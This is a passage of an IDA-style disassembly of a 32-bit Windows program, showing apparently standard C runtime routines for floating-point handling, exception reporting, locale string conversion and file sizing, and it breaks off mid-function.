sub_40FE47 proc near ; CODE XREF: sub_40A6EF:loc_40A7B4�p
var_9C = qword ptr -9Ch
var_94 = qword ptr -94h
var_8C = qword ptr -8Ch
var_84 = dword ptr -84h
var_80 = byte ptr -80h
var_40 = dword ptr -40h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 80h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+80h+var_4], eax
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_40FB20
add esp, 0Ch
test eax, eax
jnz short loc_40FE99
and [esp+80h+var_40], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_18]
push [ebp+arg_0]
push eax
lea eax, [esp+98h+var_80]
push eax
call sub_40F846
add esp, 1Ch
loc_40FE99: ; CODE XREF: sub_40FE47+2B�j
push [ebp+arg_0]
call sub_40FD29
add esp, 4
cmp ds:dword_423FC0, 0
jnz short loc_40FED8
test eax, eax
jz short loc_40FED8
push [ebp+arg_18] ; int
fld [ebp+arg_10]
sub esp, 18h
fstp [esp+9Ch+var_8C]
fldz
fstp [esp+9Ch+var_94]
fld [ebp+arg_8]
fstp [esp+9Ch+var_9C]
push [ebp+arg_4] ; int
push eax ; int
call sub_40FD56
add esp, 24h
jmp short loc_40FEF2
; ---------------------------------------------------------------------------
loc_40FED8: ; CODE XREF: sub_40FE47+64�j
; sub_40FE47+68�j
push eax
call sub_40FD01
mov [esp+84h+var_84], 0FFFFh
push [ebp+arg_18]
call sub_41005D
fld [ebp+arg_10]
pop ecx
pop ecx
loc_40FEF2: ; CODE XREF: sub_40FE47+8F�j
mov ecx, [esp+80h+var_4]
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn
sub_40FE47 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40FF01(double)
sub_40FF01 proc near ; CODE XREF: sub_40A6EF:loc_40A775�p
var_8 = qword ptr -8
arg_0 = qword ptr 4
push ecx
push ecx
fld [esp+8+arg_0]
frndint
fstp [esp+8+var_8]
fld [esp+8+var_8]
pop ecx
pop ecx
retn
sub_40FF01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FF12(double,int)
sub_40FF12 proc near ; CODE XREF: sub_40FF97+79�p
; sub_40FF97+8E�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
fld [ebp+arg_0]
mov ecx, dword ptr [ebp+arg_0+6]
fstp [ebp+var_8]
add eax, 3FEh
shl eax, 4
and ecx, 0FFFF800Fh
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_40FF12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FF3C proc near ; CODE XREF: sub_40A6EF+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_40FF54
cmp [ebp+arg_0], edx
jnz short loc_40FF67
xor eax, eax
inc eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FF54: ; CODE XREF: sub_40FF3C+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_40FF67
cmp [ebp+arg_0], edx
jnz short loc_40FF67
push 2
loc_40FF64: ; CODE XREF: sub_40FF3C+3C�j
; sub_40FF3C+55�j
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FF67: ; CODE XREF: sub_40FF3C+11�j
; sub_40FF3C+1F�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_40FF7A
push 3
jmp short loc_40FF64
; ---------------------------------------------------------------------------
loc_40FF7A: ; CODE XREF: sub_40FF3C+38�j
cmp cx, 7FF0h
jnz short loc_40FF93
test [ebp+arg_4], 7FFFFh
jnz short loc_40FF8F
cmp [ebp+arg_0], edx
jz short loc_40FF93
loc_40FF8F: ; CODE XREF: sub_40FF3C+4C�j
push 4
jmp short loc_40FF64
; ---------------------------------------------------------------------------
loc_40FF93: ; CODE XREF: sub_40FF3C+43�j
; sub_40FF3C+51�j
xor eax, eax
pop ebp
retn
sub_40FF3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FF97(double,int)
sub_40FF97 proc near ; CODE XREF: sub_40FB20+122�p
var_C = qword ptr -0Ch
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
fldz
fcom [ebp+arg_0]
fnstsw ax
test ah, 44h
jp short loc_40FFAD
xor edx, edx
jmp loc_41003F
; ---------------------------------------------------------------------------
loc_40FFAD: ; CODE XREF: sub_40FF97+D�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_41001A
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_40FFC5
cmp dword ptr [ebp+arg_0], ecx
jz short loc_41001A
loc_40FFC5: ; CODE XREF: sub_40FF97+27�j
fcomp [ebp+arg_0]
mov edx, 0FFFFFC03h
fnstsw ax
test ah, 41h
jnz short loc_40FFD9
xor eax, eax
inc eax
jmp short loc_40FFF1
; ---------------------------------------------------------------------------
loc_40FFD9: ; CODE XREF: sub_40FF97+3B�j
xor eax, eax
jmp short loc_40FFF1
; ---------------------------------------------------------------------------
loc_40FFDD: ; CODE XREF: sub_40FF97+5E�j
shl dword ptr [ebp+arg_0+4], 1
test dword ptr [ebp+arg_0], 80000000h
jz short loc_40FFED
or dword ptr [ebp+arg_0+4], 1
loc_40FFED: ; CODE XREF: sub_40FF97+50�j
shl dword ptr [ebp+arg_0], 1
dec edx
loc_40FFF1: ; CODE XREF: sub_40FF97+40�j
; sub_40FF97+44�j
test byte ptr [ebp+arg_0+6], 10h
jz short loc_40FFDD
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_410007
or word ptr [ebp+arg_0+6], 8000h
loc_410007: ; CODE XREF: sub_40FF97+68�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
call sub_40FF12
add esp, 0Ch
jmp short loc_41003F
; ---------------------------------------------------------------------------
loc_41001A: ; CODE XREF: sub_40FF97+1E�j
; sub_40FF97+2C�j
push ecx ; int
fstp st
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
call sub_40FF12
mov edx, dword ptr [ebp+arg_0+6]
shr edx, 4
and edx, 7FFh
add esp, 0Ch
sub edx, 3FEh
loc_41003F: ; CODE XREF: sub_40FF97+11�j
; sub_40FF97+81�j
mov eax, [ebp+arg_8]
mov [eax], edx
pop ebp
retn
sub_40FF97 endp
; =============== S U B R O U T I N E =======================================
sub_410046 proc near ; CODE XREF: sub_40F846+DC�p
var_4 = word ptr -4
push ecx
fstsw [esp+4+var_4]
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_410046 endp
; =============== S U B R O U T I N E =======================================
sub_410051 proc near ; CODE XREF: sub_40F846:loc_40FA59�p
var_4 = word ptr -4
push ecx
fnstsw [esp+4+var_4]
fnclex
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_410051 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41005D proc near ; CODE XREF: sub_40A6EF+13�p
; sub_40A6EF+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
and ecx, [ebp+arg_4]
not eax
and eax, [ebp+var_4]
or eax, ecx
movzx eax, ax
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_41005D endp
; =============== S U B R O U T I N E =======================================
sub_410084 proc near ; CODE XREF: sub_40FB20+20�p
; sub_40FB20+3A�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 4
push ecx
push ecx
mov cl, byte ptr [esp+8+arg_0]
test cl, 1
jz short loc_41009A
fld ds:tbyte_4240E0
fistp [esp+8+arg_0]
wait
loc_41009A: ; CODE XREF: sub_410084+9�j
test cl, 8
jz short loc_4100AF
fstsw ax
fld ds:tbyte_4240E0
fstp [esp+8+var_8]
wait
fstsw ax
loc_4100AF: ; CODE XREF: sub_410084+19�j
test cl, 10h
jz short loc_4100BE
fld ds:tbyte_4240EC
fstp [esp+8+var_8]
wait
loc_4100BE: ; CODE XREF: sub_410084+2E�j
test cl, 4
jz short loc_4100CC
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_4100CC: ; CODE XREF: sub_410084+3D�j
test cl, 20h
jz short loc_4100D7
fldpi
fstp [esp+8+var_8]
wait
loc_4100D7: ; CODE XREF: sub_410084+4B�j
pop ecx
pop ecx
retn
sub_410084 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4100DA proc near ; CODE XREF: sub_4134A7+243�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421908
call __SEH_prolog4
xor eax, eax
cmp ds:dword_433C7C, eax
jz short loc_410146
test byte ptr [ebp+arg_0], 40h
jz short loc_41013E
cmp ds:dword_4240F8, eax
jz short loc_41013E
mov [ebp+ms_exc.disabled], eax
ldmxcsr [ebp+arg_0]
jmp short loc_410135
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0C0000005h
jz short loc_41011F
cmp eax, 0C000001Dh
jz short loc_41011F
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41011F: ; CODE XREF: sub_4100DA+39�j
; sub_4100DA+40�j
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
and ds:dword_4240F8, 0
and [ebp+arg_0], 0FFFFFFBFh
ldmxcsr [ebp+arg_0]
loc_410135: ; CODE XREF: sub_4100DA+2B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
jmp short loc_410146
; ---------------------------------------------------------------------------
loc_41013E: ; CODE XREF: sub_4100DA+1A�j
; sub_4100DA+22�j
and [ebp+arg_0], 0FFFFFFBFh
ldmxcsr [ebp+arg_0]
loc_410146: ; CODE XREF: sub_4100DA+14�j
; sub_4100DA+62�j
call __SEH_epilog4
retn
sub_4100DA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41014C proc near ; CODE XREF: sub_41019D+A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_40271F
movzx eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov dl, [ebp+arg_C]
test [ecx+eax+1Dh], dl
jnz short loc_41018B
cmp [ebp+arg_8], 0
jz short loc_410185
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, [ebp+arg_8]
jmp short loc_410187
; ---------------------------------------------------------------------------
loc_410185: ; CODE XREF: sub_41014C+25�j
xor eax, eax
loc_410187: ; CODE XREF: sub_41014C+37�j
test eax, eax
jz short loc_41018E
loc_41018B: ; CODE XREF: sub_41014C+1F�j
xor eax, eax
inc eax
loc_41018E: ; CODE XREF: sub_41014C+3D�j
cmp [ebp+var_4], 0
jz short locret_41019B
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_41019B: ; CODE XREF: sub_41014C+46�j
leave
retn
sub_41014C endp
; =============== S U B R O U T I N E =======================================
sub_41019D proc near ; CODE XREF: sub_40AB84+3F�p
; sub_40ACBC+53�p ...
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
push 0
call sub_41014C
add esp, 10h
retn
sub_41019D endp
; =============== S U B R O U T I N E =======================================
sub_4101B0 proc near ; CODE XREF: sub_40B11E+56�p
; sub_40B699+59�p ...
arg_0 = dword ptr 4
xor eax, eax
inc eax
cmp [esp+arg_0], 0
jnz short locret_4101BC
xor eax, eax
locret_4101BC: ; CODE XREF: sub_4101B0+8�j
retn
sub_4101B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_4101BD proc near ; CODE XREF: sub_40BE59:loc_40BE87�p
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+2A8h+var_4], eax
test ds:byte_4240FC, 1
push esi
jz short loc_4101EA
push 0Ah
call sub_409AB4
pop ecx
loc_4101EA: ; CODE XREF: sub_4101BD+23�j
call sub_40DD1C
test eax, eax
jz short loc_4101FB
push 16h
call sub_40DD29
pop ecx
loc_4101FB: ; CODE XREF: sub_4101BD+34�j
test ds:byte_4240FC, 2
jz loc_4102A8
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_407B70
lea eax, [ebp+2A8h+var_328]
add esp, 0Ch
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
push 0
mov [ebp+2A8h+var_328], 40000015h
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call ds:dword_41D19C
lea eax, [ebp+2A8h+var_2D8]
push eax
call ds:dword_41D198 ; UnhandledExceptionFilter
loc_4102A8: ; CODE XREF: sub_4101BD+45�j
push 3
call sub_407AEA
int 3 ; Trap to Debugger
sub_4101BD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102B0 proc near ; CODE XREF: sub_40BF57+25A�p
; sub_40C33C+150�p
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push 6
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
mov [ebp+var_6], 0
call ds:dword_41D054
test eax, eax
jnz short loc_4102E1
or eax, 0FFFFFFFFh
jmp short loc_4102EB
; ---------------------------------------------------------------------------
loc_4102E1: ; CODE XREF: sub_4102B0+2A�j
lea eax, [ebp+var_C]
push eax
call sub_403EBD
pop ecx
loc_4102EB: ; CODE XREF: sub_4102B0+2F�j
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_4102B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102F7 proc near ; CODE XREF: sub_40BF57+285�p
; sub_40BF57+336�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_10]
mov [ebp+var_28], eax
mov eax, [ebp+arg_C]
push ebx
mov [ebp+var_30], eax
mov eax, [eax]
push esi
mov [ebp+var_24], eax
mov eax, [ebp+arg_0]
push edi
xor edi, edi
cmp eax, [ebp+arg_4]
mov [ebp+var_34], ecx
mov [ebp+var_20], edi
mov [ebp+var_2C], edi
jz loc_410494
mov esi, ds:dword_41D1B4
lea ecx, [ebp+var_18]
push ecx
push eax
call esi
test eax, eax
mov ebx, ds:dword_41D0A0
jz short loc_4103AA
cmp [ebp+var_18], 1
jnz short loc_4103AA
lea eax, [ebp+var_18]
push eax
push [ebp+arg_4]
call esi
test eax, eax
jz short loc_4103AA
cmp [ebp+var_18], 1
jnz short loc_4103AA
mov esi, [ebp+var_24]
cmp esi, 0FFFFFFFFh
mov [ebp+var_2C], 1
jnz short loc_410380
push [ebp+var_28]
call sub_404130
mov esi, eax
pop ecx
inc esi
loc_410380: ; CODE XREF: sub_4102F7+7B�j
cmp esi, edi
loc_410382: ; CODE XREF: sub_4102F7+C6�j
jle short loc_4103DF
cmp esi, 7FFFFFF0h
ja short loc_4103DF
lea eax, [esi+esi+8]
cmp eax, 400h
ja short loc_4103C6
call sub_4104B0
mov eax, esp
cmp eax, edi
jz short loc_4103DA
mov dword ptr [eax], 0CCCCh
jmp short loc_4103D7
; ---------------------------------------------------------------------------
loc_4103AA: ; CODE XREF: sub_4102F7+53�j
; sub_4102F7+59�j ...
push edi
push edi
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx
mov esi, eax
cmp esi, edi
jnz short loc_410382
loc_4103BF: ; CODE XREF: sub_4102F7+EE�j
xor eax, eax
jmp loc_410497
; ---------------------------------------------------------------------------
loc_4103C6: ; CODE XREF: sub_4102F7+9E�j
push eax
call sub_4036E0
cmp eax, edi
pop ecx
jz short loc_4103DA
mov dword ptr [eax], 0DDDDh
loc_4103D7: ; CODE XREF: sub_4102F7+B1�j
add eax, 8
loc_4103DA: ; CODE XREF: sub_4102F7+A9�j
; sub_4102F7+D8�j
mov [ebp+var_1C], eax
jmp short loc_4103E2
; ---------------------------------------------------------------------------
loc_4103DF: ; CODE XREF: sub_4102F7:loc_410382�j
; sub_4102F7+93�j
mov [ebp+var_1C], edi
loc_4103E2: ; CODE XREF: sub_4102F7+E6�j
cmp [ebp+var_1C], edi
jz short loc_4103BF
lea eax, [esi+esi]
push eax
push edi
push [ebp+var_1C]
call sub_407B70
add esp, 0Ch
push esi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx
test eax, eax
jz short loc_41048B
mov ebx, [ebp+var_34]
cmp ebx, edi
jz short loc_410430
push edi
push edi
push [ebp+arg_14]
push ebx
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ds:dword_41D138
test eax, eax
jz short loc_41048B
mov [ebp+var_20], ebx
jmp short loc_41048B
; ---------------------------------------------------------------------------
loc_410430: ; CODE XREF: sub_4102F7+11A�j
cmp [ebp+var_2C], edi
mov ebx, ds:dword_41D138
jnz short loc_41044F
push edi
push edi
push edi
push edi
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx
mov esi, eax
cmp esi, edi
jz short loc_41048B
loc_41044F: ; CODE XREF: sub_4102F7+142�j
push esi
push 1
call sub_40777A
cmp eax, edi
pop ecx
pop ecx
mov [ebp+var_20], eax
jz short loc_41048B
push edi
push edi
push esi
push eax
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx
cmp eax, edi
jnz short loc_410480
push [ebp+var_20]
call sub_403603
pop ecx
mov [ebp+var_20], edi
jmp short loc_41048B
; ---------------------------------------------------------------------------
loc_410480: ; CODE XREF: sub_4102F7+179�j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_41048B
mov ecx, [ebp+var_30]
mov [ecx], eax
loc_41048B: ; CODE XREF: sub_4102F7+113�j
; sub_4102F7+132�j ...
push [ebp+var_1C]
call sub_40BF3C
pop ecx
loc_410494: ; CODE XREF: sub_4102F7+38�j
mov eax, [ebp+var_20]
loc_410497: ; CODE XREF: sub_4102F7+CA�j
lea esp, [ebp-40h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_4102F7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4104B0 proc near ; CODE XREF: sub_40BF57+F3�p
; sub_40BF57+1B1�p ...
arg_0 = byte ptr 4
push ecx
lea ecx, [esp+4+arg_0]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp sub_411400
sub_4104B0 endp
; ---------------------------------------------------------------------------
push ecx
lea ecx, [esp+8]
sub ecx, eax
and ecx, 7
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp sub_411400
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104DC proc near ; CODE XREF: sub_40CE5A+2A1�p
; sub_40CE5A+2C1�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
xor esi, esi
cmp ds:dword_424218, esi
jz short loc_410545
cmp ds:dword_424224, 0FFFFFFFEh
jnz short loc_410505
call sub_41142B
loc_410505: ; CODE XREF: sub_4104DC+22�j
mov eax, ds:dword_424224
cmp eax, 0FFFFFFFFh
jnz short loc_410515
loc_41050F: ; CODE XREF: sub_4104DC+56�j
; sub_4104DC+61�j ...
or ax, 0FFFFh
jmp short loc_410585
; ---------------------------------------------------------------------------
loc_410515: ; CODE XREF: sub_4104DC+31�j
push esi
lea ecx, [ebp+var_10]
push ecx
push 1
lea ecx, [ebp+arg_0]
push ecx
push eax
call ds:dword_41D0AC
test eax, eax
jnz short loc_410592
cmp ds:dword_424218, 2
jnz short loc_41050F
call ds:dword_41D0F0
cmp eax, 78h
jnz short loc_41050F
mov ds:dword_424218, esi
loc_410545: ; CODE XREF: sub_4104DC+19�j
push esi
push esi
push 5
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+arg_0]
push eax
push esi
call ds:dword_41D0B0
push eax
call ds:dword_41D138
mov ecx, ds:dword_424224
cmp ecx, 0FFFFFFFFh
jz short loc_41050F
push esi
lea edx, [ebp+var_10]
push edx
push eax
lea eax, [ebp+var_C]
push eax
push ecx
call ds:dword_41D0B4
test eax, eax
jz short loc_41050F
loc_410581: ; CODE XREF: sub_4104DC+C0�j
mov ax, [ebp+arg_0]
loc_410585: ; CODE XREF: sub_4104DC+37�j
mov ecx, [ebp+var_4]
xor ecx, ebp
pop esi
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_410592: ; CODE XREF: sub_4104DC+4D�j
mov ds:dword_424218, 1
jmp short loc_410581
sub_4104DC endp
; =============== S U B R O U T I N E =======================================
sub_41059E proc near ; DATA XREF: J8@F_7_S:off_423F80�o
; J8@F_7_S:off_423F84�o ...
push 2
call sub_40785D
pop ecx
retn
sub_41059E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105A7 proc near ; CODE XREF: sub_40E072+36F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
xor ebx, ebx
push 1
push ebx
push ebx
push [ebp+arg_0]
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call sub_40CCBE
mov [ebp+var_18], eax
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
mov [ebp+var_14], edx
jz short loc_41062D
push 2
push ebx
push ebx
push [ebp+arg_0]
call sub_40CCBE
mov ecx, eax
and ecx, edx
add esp, 10h
cmp ecx, 0FFFFFFFFh
jz short loc_41062D
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
sub esi, eax
sbb edi, edx
js loc_4106C2
jg short loc_410606
cmp esi, ebx
jbe loc_4106C2
loc_410606: ; CODE XREF: sub_4105A7+55�j
mov ebx, 1000h
push ebx
push 8
call ds:dword_41D100
push eax
call ds:dword_41D114
test eax, eax
mov [ebp+var_4], eax
jnz short loc_410639
call sub_4057D3
mov dword ptr [eax], 0Ch
loc_41062D: ; CODE XREF: sub_4105A7+2B�j
; sub_4105A7+43�j ...
call sub_4057D3
mov eax, [eax]
loc_410634: ; CODE XREF: sub_4105A7+1AF�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_410639: ; CODE XREF: sub_4105A7+79�j
push 8000h
push [ebp+arg_0]
call sub_4107CD
pop ecx
pop ecx
mov [ebp+var_8], eax
loc_41064B: ; CODE XREF: sub_4105A7+CF�j
; sub_4105A7+D3�j
test edi, edi
jl short loc_410659
jg short loc_410655
cmp esi, ebx
jb short loc_410659
loc_410655: ; CODE XREF: sub_4105A7+A8�j
mov eax, ebx
jmp short loc_41065B
; ---------------------------------------------------------------------------
loc_410659: ; CODE XREF: sub_4105A7+A6�j
; sub_4105A7+AC�j
mov eax, esi
loc_41065B: ; CODE XREF: sub_4105A7+B0�j
push eax
push [ebp+var_4]
push [ebp+arg_0]
call sub_40CE5A
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_4106A5
cdq
sub esi, eax
sbb edi, edx
js short loc_41067C
jg short loc_41064B
test esi, esi
ja short loc_41064B
loc_41067C: ; CODE XREF: sub_4105A7+CD�j
mov esi, [ebp+var_10]
loc_41067F: ; CODE XREF: sub_4105A7+119�j
push [ebp+var_8]
push [ebp+arg_0]
call sub_4107CD
pop ecx
pop ecx
push [ebp+var_4]
push 0
call ds:dword_41D100
push eax
call ds:dword_41D10C
xor ebx, ebx
jmp loc_41072B
; ---------------------------------------------------------------------------
loc_4106A5: ; CODE XREF: sub_4105A7+C6�j
call sub_4057E6
cmp dword ptr [eax], 5
jnz short loc_4106BA
call sub_4057D3
mov dword ptr [eax], 0Dh
loc_4106BA: ; CODE XREF: sub_4105A7+106�j
or esi, 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_41067F
; ---------------------------------------------------------------------------
loc_4106C2: ; CODE XREF: sub_4105A7+4F�j
; sub_4105A7+59�j
cmp edi, ebx
jg short loc_410737
jl short loc_4106CC
cmp esi, ebx
jnb short loc_410737
loc_4106CC: ; CODE XREF: sub_4105A7+11F�j
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CCBE
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_41062D
push [ebp+arg_0]
call sub_40ED7D
pop ecx
push eax
call ds:dword_41D0A8
neg eax
sbb eax, eax
neg eax
dec eax
cdq
mov [ebp+var_10], eax
and eax, edx
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], edx
jnz short loc_410737
call sub_4057D3
mov dword ptr [eax], 0Dh
call sub_4057E6
mov esi, eax
call ds:dword_41D0F0
mov [esi], eax
mov esi, [ebp+var_10]
loc_41072B: ; CODE XREF: sub_4105A7+F9�j
and esi, [ebp+var_C]
cmp esi, 0FFFFFFFFh
jz loc_41062D
loc_410737: ; CODE XREF: sub_4105A7+11D�j
; sub_4105A7+123�j ...
push ebx
push [ebp+var_14]
push [ebp+var_18]
push [ebp+arg_0]
call sub_40CCBE
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_41062D
xor eax, eax
jmp loc_410634
sub_4105A7 endp
; =============== S U B R O U T I N E =======================================
sub_41075B proc near ; CODE XREF: sub_40E072+322�p
; sub_40E072+37F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_40ED7D
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41077C
call sub_4057D3
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41077C: ; CODE XREF: sub_41075B+F�j
push edi
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call ds:dword_41D074
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41079D
call ds:dword_41D0F0
jmp short loc_41079F
; ---------------------------------------------------------------------------
loc_41079D: ; CODE XREF: sub_41075B+38�j
xor eax, eax
